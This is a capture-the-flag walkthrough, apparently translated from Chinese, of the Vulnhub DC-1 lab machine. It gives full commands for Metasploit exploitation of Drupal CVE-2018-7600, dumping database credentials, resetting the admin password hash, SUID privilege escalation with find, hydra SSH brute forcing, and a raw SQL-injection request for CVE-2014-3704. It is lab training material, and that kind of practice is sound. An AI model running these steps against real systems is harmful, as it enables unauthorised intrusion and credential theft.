Foreword
This is the third target drone, and I feel it is more interesting this time. This target drone has 5 flags, which is closer to the provincial competition. This time, let’s make it in the order of the flags. In fact, you can elevate getFlag in one step.
Preparation
Knowledge points
- Drupal CMS remote code execution vulnerability (CVE-2018-7600)
- Drupal CMS Sql injection vulnerability getshell (CVE-2014-3704)
- View the website configuration file to obtain the database login password
- Change the database hash value and reset the admin user password
- hydra blasts the password of flag4 user
- find suid privilege escalation
Reference article
csdn: VULNHUB target drone penetration – DC-1 (drupal)
Zhihu: Entry-level target drone: Penetration testing of DC-1
drupal7 official website: drupal7 password reset
Reebuf: A brief talk about SUID privilege escalation
csdn:DC-1 SQL injection of login box (not the focus of this article, I tried many times and only succeeded once)
Tools
You will have to develop a habit later on and write down the tools and drone addresses on your blog (to prevent forgetting)
Kali basically has it
Vulnhub target drone download
Official website address: https://www.vulnhub.com/entry/dc-1,292/
Start
Information collection
Detect the IP address of the intranet target machine
arp-scan -l netdiscover -r 192.168.30.0/24
Obtain target drone IP: 192.168.30.130
Detect target drone open ports
nmap -sS -T4 -v -O 192.168.30.130
Port 80 is open, please visit it
I have been struggling for a long time (password blasting, SQL injection, trying all the functions)…
kali identifies website cms
whatweb -v 192.168.30.130
Browser plugin Wappalyzer identifies website CMS
Another long round of tossing…
If your browser searches for vulnerabilities in this CMS version, don’t miss it. Once you search, oh my god, this CMS is really full of vulnerabilities.
I have been tossing about which loophole can be used, and back and forth, only two can be used. Others are either unusable or require remote RCE with the administrator password. And I couldn’t figure out the administrator’s password. This website also had defensive measures, so I accepted it. After a few attempts, my IP was blocked and I had to take a snapshot (fortunately, I took a snapshot)
The following two are available:
- Drupal CMS remote code execution vulnerability (CVE-2018-7600)
- Drupal CMS Sql injection vulnerability getshell (CVE-2014-3704) (I don’t know if it’s because of my sqlmap, but I haven’t been able to detect it. I tried it several times and accidentally succeeded once, but then I never succeeded.)
MSF-Drupal CMS remote code execution vulnerability
Go directly to msf
msfdb run search Drupal
The following two are all vulnerabilities that can pass through the target machine, mainly RCE, followed by SQL injection.
In one step, set the payload and target IP, getshell
use 1 set php/meterpreter/reverse_tcp set rhosts 192.168.30.130 exploit
Enter the shell and then use python to provide an interactive shell
shell python -c 'import pty; pty.spawn("/bin/bash")'
Check the directory, there is a very conspicuous flag1.txt, check it out
ls cat flag1.txt
cat flag1.txt Every good CMS needs a config file - and so do you. Translation: Every good CMS needs a configuration file, and so do you.
It means we are looking for the configuration file of the CMS
The search engine searches for important configuration files of this CMS… Why does no one put the configuration file path (I searched for a long time…)
ls sites/default default.settings.php files settings.php
According to the prompt, it should be the settings.php file, check
cat sites/default/settings.php
Get database password
flag2 appeared
There is a database connection configuration, which should be connected to the database. Thinking that the web site has a login interface, I rushed directly and looked for the password of the admin user.
$databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );
The first time, I couldn’t log in because I entered the wrong password. I thought it was a permissions issue, so I struggled here for a long time…
Connect to the database…
mysql -udbuser -pR0ck3t
show databases; + -------------------- + | Database | + -------------------- + | information_schema | | drupaldb | + -------------------- + use drupaldb; show tables;# Directly lock the users table +-----------------------------+ | Tables_in_drupaldb | +-----------------------------+ | actions | | authmap | | batch | | block | | block_custom | | block_node_type | | block_role | | blocked_ips | |.... | | users | | users_roles | | variable | | views_display | | views_view | | watchdog | +-----------------------------+
It seems that some kind of encryption algorithm is used
Supplement: The commonly used password encryption method in Drupal is the MD5 format, but since 7.0, the encryption method has been changed to hash encryption due to security issues. The custom encryption method used here should be.
select * from users \G; ****************** 2. row ****************** uid: 1 name:admin pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR mail: [email protected] theme: signature: signature_format: NULL created: 1550581826 access: 1550583852 login: 1550582362 status: 1 timezone: Australia/Melbourne language: picture: 0 init: [email protected] data: b:0;
Reset the admin user password in mysql
Search drupal7 password reset online: https://drupalchina.cn/node/1964
There is a custom encrypted php file in the scripts directory under the website directory
First temporarily launch mysql and reset the admin administrator password
php ./scripts/password-hash.sh 123456 hash: $S$DrlQBqDTMqPeUjwcC9Dwm7cRJ0ZUveSpKuGEMo7mfx9h6c/yHBgp
Replace the password part of admin with the above hash value and update the users table.
update users set pass='$S$DrlQBqDTMqPeUjwcC9Dwm7cRJ0ZUveSpKuGEMo7mfx9h6c/yHBgp' where uid=1;
After changing, log in to the website
After logging in, after a fuzzy operation, a flag3 was found.
Translation: Special PERMS will help find passwords, but you need to execute the command to find what’s in shadow.
Although, there is nothing to do in the backend of this website (because getshell does not require any operations on the backend)
According to the flag3 prompt, you should check the /etc/passwd file.
cat /etc/passwd sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
There is a user with flag 4 who can actually blast (hydra blast will be displayed in subsequent operations)
Check the file /home/flag4 (at first I thought the www-data user could not access it, but who knew that this directory was accessible to other people? Sometimes the details can really determine success or failure)
ls /home/flag4 flag4.txt #View the changed flag4 file cat /home/flag4/flag4.txt Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is? Translation: Can you use the same method to find or access the flag in the root directory? Possibly but maybe it's not that easy. Or maybe that's the case?
It is already obvious that we are required to access the flag file under root, but I went in a big circle to get here. Getshell can directly access it with elevated rights, but if you want to collect flags, you still have to follow this operation, otherwise there will be no What to do if we break up?
Elevated privileges – access final flag
View commands that can escalate privileges
find / -perm -u=s -type f 2>/dev/null
I found that the find command can escalate privileges. You can refer to an article about this, suid privilege elevation: https://www.freebuf.com/articles/web/272617.html
find / -exec "/bin/bash" -p \;
Successfully escalated privileges
bash-4.2# whoami whoami root
View the final flag file
cat /root/thefinalflag.txt
Extra knowledge-hydra blasting flag4 user password
Now participating in the 23rd Xiangshan Net Shield competition…
View the dictionary file wordlists that comes with kali
wordlists
A large dictionary rockyou.txt and a small dictionary john.lst. In actual situations, you may need to prepare a specific dictionary for blasting. This is just a demonstration process.
Start blasting
hydra -l flag4 -P /usr/share/wordlists/john.lst 192.168.30.130 ssh -f
Successfully exposed user flag4, password is: orange
Use ssh to log in remotely
ssh [email protected]
Additional knowledge-Sql injection vulnerability getshell (CVE-2014-3704)
The 2023 Xiangshan Net Shield has ended, score: 100 points, ranking 25/56, hard-won results. The first time I participated in the offensive and defensive drill was the red team. It has taken a big step to achieve results. I will participate in more projects of this type in the future. In addition, the food in the mobile building is really good.
I don’t understand this SQL injection very well. It can be successful when tested manually. But it cannot be run when using sqlmap. What is returned is a 502 error echo. Is it because of the 502?
Manual testing showed that there was SQL injection in the array subscript of the name[*] field. This injection point was seen for the first time, and it was still a hole in 2014. .
poc
POST /?q=node & amp;destination=node HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 120 pass=lol & amp;form_build_id= & amp;form_id=user_login_block & amp;op=Log + in & amp;name[0 or updatexml(0,concat(0xa,user()),0)#]=bob & amp ;name[0]=a
Use bp to send the package to view the results. The current connection user name is displayed in red, and the error injection is successful.
A slap in the face…
This time I used sqlmap and it actually worked. I couldn’t get it to work before…
sqlmap -r sql.txt --batch --dbs
Use msf to search drupal and select the third one
msf6 > search drupal msf6 > use 2
Set remote destination address
set rhosts 192.168.30.130 exploit
The rebound shell is successful, and the subsequent steps to obtain the flag are the same as before.
Summary
No summary…
It’s been so long that I can’t remember my thoughts at the time, I’ll add more later